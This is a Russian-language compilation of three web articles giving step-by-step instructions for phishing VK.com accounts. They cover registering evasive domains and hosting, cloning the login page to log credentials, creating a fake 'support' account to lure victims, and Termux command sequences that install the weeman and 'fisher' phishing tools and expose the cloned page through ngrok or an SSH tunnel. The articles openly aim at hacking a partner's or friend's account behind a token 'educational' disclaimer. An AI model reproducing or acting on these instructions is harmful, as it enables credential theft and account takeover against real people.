Данная статья написана в образовательных целях и не призывает к действиям. Будьте благоразумны и не совершайте противозаконных действий.
Фишинг – технология компьютерного взлома | Немного теории
Фишинг — вид интернет-мошенничества, целью которого является получение доступа к конфиденциальным данным пользователей — логинам и паролям.
Хостинг — услуга по предоставлению ресурсов для размещения информации на сервере, постоянно находящемся в сети (обычно Интернет).
Доменное имя — символьное имя сайта.
Сегодня я расскажу, как можно взламывать страницы в социальных сетях, не затрачивая при этом много денег, а при наличии хостинга и доменного имени вовсе бесплатно. Хотя, для данных целей, советую всё таки зарегистрировать новое, более подходящее доменное имя.
Я расскажу и покажу всё на примере сайта VK.com, он является одним из самых популярных на СНГ просторах и многие хоть раз задумывались о взломе странички своей девушки или друга.
Фишинг – технология компьютерного взлома | Процесс взлома
Весь процесс делится на три этапа:
Как взломать страницу в ВК/Как сделать фишинг страницу в ВК 2019!
- Создание поддельного сайта.
- Создание поддельного аккаунта в социальной сети (VK.com в нашем случае).
- Развод жертвы (человека, которого мы хотим взломать).
Как вы уже поняли, для взлома нам надо будет подговорить жертву для того, чтобы она перешла на наш поддельный сайт и ввела свои персональные данные. Тут уже в дело вступает социальная инженерия.
Если вы не знакомы с СИ, то можете почитать статьи, которые уже есть на сайте:
- СИ – как начать общаться с человеком
- 10 правил СИ
Этап первый: Создание поддельного сайта
Для создания сайта для фишинга нам понадобятся:
- Хостинг.
- Доменное имя.
- 100-300 грн (200-500 рублей).
- Файлы поддельного сайта.
- Хостинг – д ля хостинга лучше всего выбирать мало известные компании т.к. система слежения и защиты у данных менее развита. Размер данного хостинга можно выбирать не большой т.к. сам сайт который будет на нем лежать весит достаточно мало.
- Доменное имя – в ажно знать что домены третьего и более уровня хоть и бесплатные, но в большинстве случаев для фишинга не подходят, так как ссылка данного сайта имеет строение fish.sites.ru (где fish-домен третьего уровня, sites-домен второго уровня и ru-первого уровня) и любая соц. сеть или тот же gmail палит эту лавочку и при переходе по ссылке сразу же предупреждает о переходе на не безопасный сайт. Поэтому мы регистрируем домен второго уровня. Операция по регистрации не сложная, мало чем отличается от регистрации самого обычного email, за единственным исключением вместо почты мы прописываем имя сайта которым мы будем пользоваться. По поводу создания имени домена. Как правило создаем длинные имена для своего сайта, к тому же регистрация доменного имени ограничивается 255 символами. А доменную зону выбираем .XYZ в конечном варианте мы получаем: sdkkjfgnsdjlfgnbsdlffbvfflbvazldfbvslfhbvsthnb.xyz ну или вроде того. Сделано для того, чтобы снять хоть какие-то подозрения от того, что это фишинговый сайт. Грубо говоря, выглядит как какой-то системный переход по ссылке.
- Файлы – где взять файлы для поддельного сайта? Тут у нас множество вариантов, которыми мы можем воспользоваться:
- Существует множество CMS, которые позволяют создать одностраничный сайт в несколько кликов
- Заказать готовый сайт, если вы далеки от этой темы.
- Воспользоваться генератором, по типу Page Creator.
- Написать самому.
- Воспользоваться инструментами по копированию готовых сайтов, могу написать про клонирование сайтов на Kali Linux, если вам это интересно.
И тут важно, чтобы вся информация, которую вводит жертва в нашей форме на сайте, сохранялась в логах хостинга, а после просто перенаправляем её обратно на сайт.
Что такое фишинг и как не попасться? | Генератор QR код на Python
Итак, на данном этапе мы имеем готовый фиш. сайт который записывает всю информацию что заполняет жертва и перенаправляет его обратно к исходному сайту.
Этап второй: Создание поддельного аккаунта
Объясню на примере взлома вк, а уже перестроить данный метод для взлома почты или других социальных сетей будет не так уж и сложно.
Итак, регистрируем пользователя в вк. Даем ему какое-нибудь нейтральное имя. Например, Василий Иванов. Далее ставим на аватарку картинку из службы поддержки. После чего заходим в «мои группы» и создаем публичную страницу под названием «Агент Поддержки» или «Уведомление».
Присваиваем аватар к группе, если это «уведомление» или что-то подобное, то на автарку ставим значок граммофона ну и для «агента поддержки» соответственно. Сразу хотелось бы отметить. Подобные имена в вк уже не такая и редкость так как тема с вк уже не мало кем используется, поэтому создавайте что-нибудь индивидуальное дабы вас и вашу публичную страницу не заблокировали.
Этап третий: Развод жертвы
Для начала, нам нужно чтобы наша ссылка приобрела более приемлемый вид. Сокращаем её, в случае с вк лучше всего воспользоваться сервисом vk.cc, который они же и предоставляют.
Теперь наша ссылка vk.cc/ghty – что-то по такому типу. Согласитесь, такой вид куда лучше предыдущего. Далее набираем текст, который зацепит жертву и не оставит выбора, что-то по этому типу, тут у вас должна сработать фантазия.
Данную информацию мы размещаем на публичной странице.
Сегодня вы узнали про фишинг – технологию компьютерного взлома и помните, я никого не призываю к действиям. Поделитесь данной статьей с друзьями, чтобы они не попадались на подобные уловки, а также подписывайтесь на обновления сайта, чтобы не пропустить новые статьи.
Источник: make-info.ru
Создаем фишинговую ссылку на Android
Теневой Комитет
Сначала скачаем и установим самую новую версию «Termux»:
Для установки утилиты — нам потребуется ввести несколько команд в установленном и открытом «termux»:
Теперь обновим пакеты и репозиторий:
pkg update -y pkg upgrade -y
Установим «git» и «python 2»:
apt install git apt install python2
Скачаем утилиту «weeman»:
Установка окончена! Осталось только включить данную утилиту:
Откроем директорию инструмента:
А теперь включим саму утилиту:
python2 weeman.py
Программа запущена! Для создания фишинговой странички — читайте статью дальше:
Устанавливаем сайт, который будет скопирован ( Полный URL ):
Устанавливаем URL сайта, на который перекинет жертву, после ввода данных на нашей страничке ( Полный URL ):
Устанавливаем порт для дальнейшей работы в «ngrok» ( На не рутированных устройствах — только «8080» ) :
set port 8080
Чекаем настройки фишинг странички и запускаем сайт:
После того, как наша утилита скачала сайт и запустилась в локальной сети нашего устройства — нам нужно установить и настроить «ngrok», чтобы в дальнейшем мы смогли дать ссылку на нашу страничку жертве.
Откроем новую сессию «termux»:
Установим «ngrok»:
apt update apt upgrade
apt install git
git clone https://github.com/tchelospy/termux-ngrok.git
cd termux-ngrok
chmod +x termux-ngrok.sh
./termux-ngrok.sh
( После ввода последней команды — нужно ввести букву «y» для соглашение с установкой «ngrok» )
Теперь нам нужно авторизоваться на сайте «ngrok» любым способом: https://ngrok.com
После авторизации нам нужно скопировать ключ нашего аккаунта ( ключ замазан на картике зеленым цветом ):
После копирования ключа — нас нужно ввести команду для активации вашего аккаунта в «termux»:
ngrok authtoken
После данных манипуляций ваш аккаунт должен был подключится к «ngrok», который установлен на вашем устройстве.
Теперь вам нужно всего лишь ввести данную команду:
ngrok http 8080
С помощью данной команду мы открыли сайт в интернете, который работает в нашей локальной сети, то-есть у нас есть ссылка на фишинговый сайт:
Просто скопируйте одну из данных ссылок и киньте вашей жертве. После того, как жертва введет хоть какие-то данные на вашем сайте — они отобразятся в сесси, там где мы запустили утилиту «weeman». Если вам не нравится данная ссылка — ее можно сократить на любом сайте или приложении по сокращению ссылок.
Источник: telegra.ph
Фишинг ВКонтакте с телефона
Обратите внимание, если Вы хотите провести сделку с данным пользователем, на то, что он заблокирован.
Скачиваем в Google Play приложение Termux и устанавливаем всё что нужно вводя по очереди следующие команды:
apt update apt install python2 apt install git
Теперь так же по очереди вводим эти команды:
git clone https://github.com/foxlitegor/fisher cd fisher chmod 777 install.sh sh install.sh fish run
Теперь свайпом влево создаём новую сессию и вводим команды:
apt install openssh ssh -R 80:localhost:8080 ssh.localhost.run
Если всё правильно сделали, то нам должно выдать ссылку на нашу фишинговую страницу ВКонтакте.
Для просмотра логов просто возвращаемся к первой сессии.
Источник: dark2web.org